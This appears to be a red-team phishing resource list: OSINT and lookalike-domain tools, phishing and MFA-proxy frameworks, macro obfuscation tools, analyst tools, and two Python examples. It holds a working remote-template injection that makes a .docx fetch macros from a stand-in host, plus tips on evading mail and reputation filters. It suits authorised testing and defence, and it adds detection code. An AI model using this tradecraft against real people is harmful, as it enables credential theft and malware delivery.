BadB
OSINT Links & Tools
www.osinttechniques.com (curated OSINT link collection: Facebook tools such as Lookup-id.com, Sowdust's Facebook Matrix, Facebook Graph Searcher and the Graph codes and operators; people search engines such as Family Tree Now, PeekYou, That'sThem, Qwant, Webmii and ZabaSearch)
Maltego: www.maltego.com (downloads for the Maltego client and the CaseFile client)
Recon-ng: github.com/lanmaster53/recon-ng (modular OSINT gathering framework that cuts the time spent harvesting information from open sources)
Google dorks: www.exploit-db.com (the Google Hacking Database, GHDB, an index of search queries for finding publicly exposed information)
PHP code saving POST data: gist.github.com (dumprequest.php, a PHP script that writes the full HTTP request, method, headers and body, to a file; the usual back end for a credential-capture landing page)
Certificates
www.certificate-transparency.org
transparencyreport.google.com (Google's Certificate Transparency lookup; useful both for enumerating a target's certificates and subdomains and for spotting certificates issued for lookalikes of your own brand)
Domains
Name Generation: github.com/elceef/dnstwist (domain name permutation engine for detecting homograph, typosquatting and brand-impersonation domains; run it against your own brand to find lookalikes already registered, or against a target's to see which permutations are still free)
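The permutation classes a tool like dnstwist generates, as an added example written for this list (not dnstwist's own code, which ships much larger confusable tables and also resolves each candidate). The brand domain example.com, the confusable and keyboard tables, and the OBSERVED list are assumptions constructed for the example; in practice the observed names would come from a CT log feed or passive DNS.

```python
"""Typosquat / homograph permutation engine in the style of dnstwist.

Added example, not dnstwist's own code. Generates lookalike candidates for a
brand domain and checks a list of observed domains (constructed here; in
practice newly issued certificate names from a CT log or passive DNS)
against them, reporting which permutation class each hit belongs to.
"""

# Small confusable table; dnstwist ships a far larger one.
HOMOGLYPHS = {
    "a": "àáâãäå", "c": "çćċ", "d": "đď", "e": "èéêëēėę", "g": "ġģ",
    "i": "ìíîïl1", "l": "1łľi", "o": "òóôõöø0", "s": "śšş", "u": "ùúûüů",
    "m": ["rn"], "w": ["vv"],
}
# Neighbouring keys on a QWERTY layout (fat-finger typos).
QWERTY = {
    "q": "wa", "w": "qesa", "e": "wrsd", "r": "etdf", "t": "ryfg", "y": "tugh",
    "u": "yihj", "i": "uojk", "o": "ipkl", "p": "ol", "a": "qwsz", "s": "awedxz",
    "d": "serfcx", "f": "drtgvc", "g": "ftyhbv", "h": "gyujnb", "j": "huikmn",
    "k": "jiolm", "l": "kop", "z": "asx", "x": "zsdc", "c": "xdfv", "v": "cfgb",
    "b": "vghn", "n": "bhjm", "m": "njk",
}
VOWELS = "aeiou"
TLDS = ["com", "net", "org", "co", "io"]


def split_domain(domain):
    """'example.com' -> ('example', 'com'); assumes a single-label TLD."""
    name, _, tld = domain.lower().rpartition(".")
    return name, tld


def permutations(domain):
    """Return {permutation_class: set(candidate_domains)} for a brand domain."""
    name, tld = split_domain(domain)
    n = len(name)
    classes = {
        "omission": {name[:i] + name[i + 1:] for i in range(n)},
        "transposition": {name[:i] + name[i + 1] + name[i] + name[i + 2:]
                          for i in range(n - 1) if name[i] != name[i + 1]},
        "replacement": {name[:i] + k + name[i + 1:]
                        for i, ch in enumerate(name) for k in QWERTY.get(ch, "")},
        "insertion": {name[:i] + k + name[i:]
                      for i, ch in enumerate(name) for k in QWERTY.get(ch, "")},
        "repetition": {name[:i] + ch + name[i:] for i, ch in enumerate(name)},
        "addition": {name + ch for ch in "abcdefghijklmnopqrstuvwxyz0123456789"},
        "hyphenation": {name[:i] + "-" + name[i:] for i in range(1, n)},
        "vowel-swap": {name[:i] + v + name[i + 1:] for i, ch in enumerate(name)
                       if ch in VOWELS for v in VOWELS if v != ch},
        "homoglyph": {name[:i] + g + name[i + 1:]
                      for i, ch in enumerate(name) for g in HOMOGLYPHS.get(ch, [])},
    }
    # Drop the brand itself and empty labels, then re-attach the TLD.
    result = {cls: {f"{c}.{tld}" for c in cands if c and c != name}
              for cls, cands in classes.items()}
    result["tld-swap"] = {f"{name}.{t}" for t in TLDS if t != tld}
    return result


def to_ascii(domain):
    """IDNA-encode a candidate so it compares equal to what DNS and CT logs show."""
    try:
        return domain.encode("idna").decode("ascii")
    except UnicodeError:
        return None  # label the IDNA rules reject; nobody can register it anyway


def flag_lookalikes(brand, observed):
    """Map each observed domain that is a permutation of `brand` to its class."""
    index = {}
    for cls, cands in permutations(brand).items():
        for cand in cands:
            ascii_form = to_ascii(cand)
            if ascii_form:
                index.setdefault(ascii_form, cls)  # first class to claim a name wins
    return {d: index[d.lower()] for d in observed if d.lower() in index}


# Constructed sample of recently seen names (not real observations).
OBSERVED = [
    "example.com",            # the brand itself: never flagged
    "exmaple.com",            # transposition
    "examp1e.com",            # homoglyph (l -> 1)
    "exarnple.com",           # homoglyph (m -> rn)
    to_ascii("exàmple.com"),  # punycode form, as a CT log would list it
    "example.co",             # tld-swap
    "example-login.com",      # not a pure permutation: this engine misses it
]

if __name__ == "__main__":
    for cls, cands in permutations("example.com").items():
        print(f"{cls:14s} {len(cands):4d}  e.g. {sorted(cands)[0]}")
    for domain, cls in flag_lookalikes("example.com", OBSERVED).items():
        print(f"LOOKALIKE {domain} ({cls})")
```

The last entry in the sample shows the limit of pure permutation: a domain that appends a word to the brand is not generated, which is why dnstwist is usually paired with a dictionary of suffixes (login, secure, mail, and so on) and with CT log monitoring rather than used alone.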
Scoring / Ranking: www.alexa.com (Alexa web rankings; Amazon retired the Alexa ranking service in May 2022, so a current ranking source such as the Tranco list is needed for this step)
WHOIS privacy / history: https://whois-history.whoisxmlapi.com
Ageing: www.expireddomains.net (daily updated lists of expiring and dropped domains across hundreds of TLDs; an aged domain with existing history draws less scrutiny from reputation filters than a fresh registration)
Web Archive: web.archive.org (Wayback Machine; check what a candidate domain used to host before reusing it)
Categorization (check how web proxies classify a domain before a campaign; some of these URLs predate vendor acquisitions and now redirect, e.g. SenderBase to Cisco Talos and Websense to Forcepoint)
BlueCoat: http://sitereview.bluecoat.com/sitereview.jsp
Cisco: http://www.senderbase.org/home
McAfee: http://www.mcafee.com/us/threat-center.aspx
Trend Micro: https://global.sitesafety.trendmicro.com
Websense: http://csi.websense.com
Zscaler: http://zulu.zscaler.com
SE Tools
Evilginx (MITM phishing framework): github.com/kgretzky/evilginx2 (standalone man-in-the-middle framework that proxies the real login page and captures credentials together with the session cookies, so a one-time-code or push second factor is defeated by replaying the authenticated session; origin-bound authenticators such as FIDO2/WebAuthn do not complete against the proxy's domain)
SET: github.com/trustedsec/social-engineer-toolkit (the Social-Engineer Toolkit from TrustedSec; all new versions are released there)
BeEF: github.com/beefproject/beef (the Browser Exploitation Framework)
GoPhish: github.com/gophish/gophish (open-source phishing toolkit); user guide at docs.getgophish.com
KingPhisher: github.com/rsmusllp/king-phisher (phishing campaign toolkit)
Macro
VBA: docs.microsoft.com, "Walkthrough: Calling Windows APIs (Visual Basic)" (how Declare statements expose Win32 APIs to Basic code)
Accessing Clipboard
Didier's resources: github.com/DidierStevens/DidierStevensSuite (the repository asks for no pull requests)
Obfuscation:
github.com/sevagas/macro_pack (macro_pack by @EmericNasi: automates obfuscation and generation of Office documents, VB scripts, shortcuts and other formats for pentest, demo and social engineering assessments)
github.com/bonnetn/vba-obfuscator (2018 school project, proof of concept of code obfuscation in Word macros)
EvilClippy (Obfuscation): github.com/outflanknl/EvilClippy (cross-platform assistant for creating malicious MS Office documents: hides VBA macros, stomps VBA, i.e. replaces the source text while leaving the compiled P-code that Office actually runs when its version matches, and confuses macro analysis tools; runs on Linux, macOS and Windows); write-up at outflank.nl, "Evil Clippy: MS Office maldoc assistant", released at Black Hat Asia
Unicorn (Macro generation and more): github.com/trustedsec/unicorn (PowerShell downgrade attack that injects shellcode straight into memory; based on Matthew Graeber's PowerShell attacks and the PowerShell bypass technique presented by David Kennedy of TrustedSec)
Macros from remote templates: github.com/mantvydasb/RedTeaming-Tactics-and-Techniques, offensive-security/initial-access/phishing-with-ms-office/inject-macros-from-a-remote-dotm-template-docx-with-macros.md (a macro-free .docx whose attached template points at a remote .dotm; Word fetches the template when the document is opened and the macros arrive with it, so the file that passes through mail filtering contains no VBA)
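The remote-template trick from the linked page, as an added example written for this list rather than code from that write-up. It builds a constructed minimal .docx, rewrites word/settings.xml and word/_rels/settings.xml.rels so the attached template is an external URL, and then runs the check an analyst would apply to a suspicious document. The URL, the relationship Id rId1337 and the sample document are assumptions; whether Word opens this stripped-down file is not claimed, the point is the two XML parts involved.

```python
"""Remote-template injection into a .docx, and its detection.

Added example, not the code from the linked write-up. A .docx is a zip of XML
parts. word/settings.xml may carry <w:attachedTemplate r:id="..."/>, resolved
through word/_rels/settings.xml.rels. If that relationship is External and
points at a .dotm on a web server, Word fetches the template on open and its
macros come along (still subject to the macro security prompt) while the .docx
itself holds no VBA. Those two parts are what find_remote_templates() checks.
"""
import io
import zipfile
import xml.etree.ElementTree as ET

W = "http://schemas.openxmlformats.org/wordprocessingml/2006/main"
R = "http://schemas.openxmlformats.org/officeDocument/2006/relationships"
PKG = "http://schemas.openxmlformats.org/package/2006/relationships"
ATTACHED_TEMPLATE = R + "/attachedTemplate"
SETTINGS, SETTINGS_RELS = "word/settings.xml", "word/_rels/settings.xml.rels"


def build_minimal_docx():
    """Constructed sample: a bare, macro-free .docx with one paragraph."""
    parts = {
        "[Content_Types].xml":
            '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">'
            '<Default Extension="rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>'
            '<Default Extension="xml" ContentType="application/xml"/>'
            '<Override PartName="/word/document.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.document.main+xml"/>'
            '<Override PartName="/word/settings.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.settings+xml"/>'
            '</Types>',
        "_rels/.rels":
            f'<Relationships xmlns="{PKG}"><Relationship Id="rId1" '
            f'Type="{R}/officeDocument" Target="word/document.xml"/></Relationships>',
        "word/_rels/document.xml.rels":
            f'<Relationships xmlns="{PKG}"><Relationship Id="rId1" '
            f'Type="{R}/settings" Target="settings.xml"/></Relationships>',
        "word/document.xml":
            f'<w:document xmlns:w="{W}"><w:body><w:p><w:r><w:t>Invoice Q3</w:t>'
            '</w:r></w:p></w:body></w:document>',
        SETTINGS: f'<w:settings xmlns:w="{W}"><w:zoom w:percent="100"/></w:settings>',
    }
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        for name, xml in parts.items():
            z.writestr(name, xml)
    return buf.getvalue()


def inject_remote_template(docx_bytes, template_url, rel_id="rId1337"):
    """Return a copy of the .docx whose attached template is `template_url`.

    rel_id is an assumed value; it must not collide with an Id already present
    in settings.xml.rels. Other relationships in that part are preserved.
    """
    ET.register_namespace("w", W)
    ET.register_namespace("r", R)
    ET.register_namespace("", PKG)
    src = zipfile.ZipFile(io.BytesIO(docx_bytes))
    out = io.BytesIO()
    with zipfile.ZipFile(out, "w", zipfile.ZIP_DEFLATED) as dst:
        for item in src.infolist():
            data = src.read(item.filename)
            if item.filename == SETTINGS_RELS:
                continue  # rewritten below
            if item.filename == SETTINGS:
                root = ET.fromstring(data)
                for old in root.findall(f"{{{W}}}attachedTemplate"):
                    root.remove(old)
                el = ET.Element(f"{{{W}}}attachedTemplate", {f"{{{R}}}id": rel_id})
                # Inserted first for brevity; the schema orders attachedTemplate
                # after w:proofState, so a tool for real documents should do that.
                root.insert(0, el)
                data = ET.tostring(root, encoding="UTF-8", xml_declaration=True)
            dst.writestr(item, data)
        rels = (ET.fromstring(src.read(SETTINGS_RELS)) if SETTINGS_RELS in src.namelist()
                else ET.Element(f"{{{PKG}}}Relationships"))
        for old in [rel for rel in rels if rel.get("Type") == ATTACHED_TEMPLATE]:
            rels.remove(old)
        ET.SubElement(rels, f"{{{PKG}}}Relationship", {
            "Id": rel_id, "Type": ATTACHED_TEMPLATE,
            "Target": template_url, "TargetMode": "External"})
        dst.writestr(SETTINGS_RELS, ET.tostring(rels, encoding="UTF-8", xml_declaration=True))
    return out.getvalue()


def is_remote(target):
    """True for targets that make Word reach out over the network on open."""
    return target.lower().startswith(("http://", "https://", "\\\\"))


def find_remote_templates(docx_bytes):
    """Analyst check: (rel_id, target, remote?) for each external attached template."""
    z = zipfile.ZipFile(io.BytesIO(docx_bytes))
    names = set(z.namelist())
    if SETTINGS not in names or SETTINGS_RELS not in names:
        return []
    settings = ET.fromstring(z.read(SETTINGS))
    wanted = {el.get(f"{{{R}}}id") for el in settings.iter(f"{{{W}}}attachedTemplate")}
    hits = []
    for rel in ET.fromstring(z.read(SETTINGS_RELS)).iter(f"{{{PKG}}}Relationship"):
        if rel.get("Id") in wanted and rel.get("TargetMode", "Internal").lower() == "external":
            hits.append((rel.get("Id"), rel.get("Target"), is_remote(rel.get("Target"))))
    return hits


if __name__ == "__main__":
    clean = build_minimal_docx()
    armed = inject_remote_template(clean, "http://203.0.113.10/t/invoice.dotm")  # assumed URL
    print("clean:", find_remote_templates(clean))
    print("armed:", find_remote_templates(armed))
```

A document saved by Word with a local template attached also yields an External relationship (a file:/// path to Normal.dotm or a network share), which is why the check reports the target and lets the caller judge it rather than treating every external template as hostile; a UNC path is flagged as remote because Word will authenticate to it on open.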
Metadata: exiftool.org (ExifTool by Phil Harvey, a command-line application and Perl library for reading and writing EXIF, GPS, IPTC, XMP, makernotes and other metadata in image, audio and video files; Windows, macOS and Unix)
Red Teamer Testing Tools
Wireshark: https://www.wireshark.org
Charles Proxy: https://www.charlesproxy.com
Burp: https://portswigger.net/burp
Malware samples
www.hybrid-analysis.com (free automated analysis powered by Falcon Sandbox; its File Collections section has sample sets)
https://zeltser.com/malware-sample-sources/ (list of sample sources)
Defender/Analyst tools
videos.didierstevens.com (oledump.py videos, for example analyzing .msg files with plugin_msg_summary, with a matching ISC diary entry)
blog.didierstevens.com (oledump.py, an analyzer for OLE files in the Compound File Binary Format, which covers legacy .doc/.xls files and the vbaProject.bin inside .docm/.xlsm; the free "Workshop Malicious Documents" videos show how to use it)
www.decalage.info (oletools, Python tools to analyze OLE and MS Office files)
github.com/decalage2/oletools (olevba and the rest of oletools: analysis of MS OLE2 files and MS Office documents for malware analysis, forensics and debugging)
https://gchq.github.io/CyberChef/ (encoder/decoder)
https://code.visualstudio.com/ (free IDE from Microsoft)
https://www.automateexcel.com/vba-code-indenter/ (VBA code indenter)
https://github.com/MalwareCantFly/Vba2Graph (Vba2Graph, call graphs of VBA code)
https://github.com/decalage2/ViperMonkey (VBA emulation engine written in Python)
ASR (Attack Surface Reduction) Rules: docs.microsoft.com, "Use attack surface reduction rules to prevent malware infection" (Microsoft Defender for Endpoint; ASR rules stop apps and scripts from being used to infect devices, and the Office rules in particular, blocking Office from creating child processes, creating executable content and injecting into other processes, break most of the macro tradecraft listed above)